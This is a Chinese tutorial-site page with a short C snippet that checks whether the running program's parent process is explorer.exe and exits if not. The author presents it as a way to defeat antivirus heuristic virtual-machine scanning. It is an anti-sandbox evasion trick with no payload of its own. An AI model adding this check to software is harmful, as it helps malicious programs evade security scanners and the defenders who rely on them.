网站地图    收藏   

主页 > 系统 > 虚拟机 >

可怜的高级虚拟机启发式查毒 - 虚拟机教程文章

来源:自学PHP网    时间:2015-04-14 13:34 作者: 阅读:

[导读] 被我十几行代码就咔嚓了,而且还没用奇技淫巧,呵呵:DWORD fpid,epid;void VMM(){ PROCESSENTRY32 pe; HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); pe.dwSize=sizeof(PROCESS...

被我十几行代码就咔嚓了,而且还没用奇技淫巧,呵呵:

DWORD fpid,epid;

void VMM()
{
   PROCESSENTRY32 pe;
   HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
   pe.dwSize=sizeof(PROCESSENTRY32);
   if (Process32First(hkz,&pe))
   {
    do
    {
       if (pe.th32ProcessID==GetCurrentProcessId())
       {
                     fpid=pe.th32ParentProcessID;
       }
      
       if (stricmp(pe.szExeFile,"explorer.exe")==0)
       {
                     epid=pe.th32ProcessID;
       }
    }
    while(Process32Next(hkz,&pe));
  }
}

主函数里:
VMM();
if(fpid!=epid)
   return 0;

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论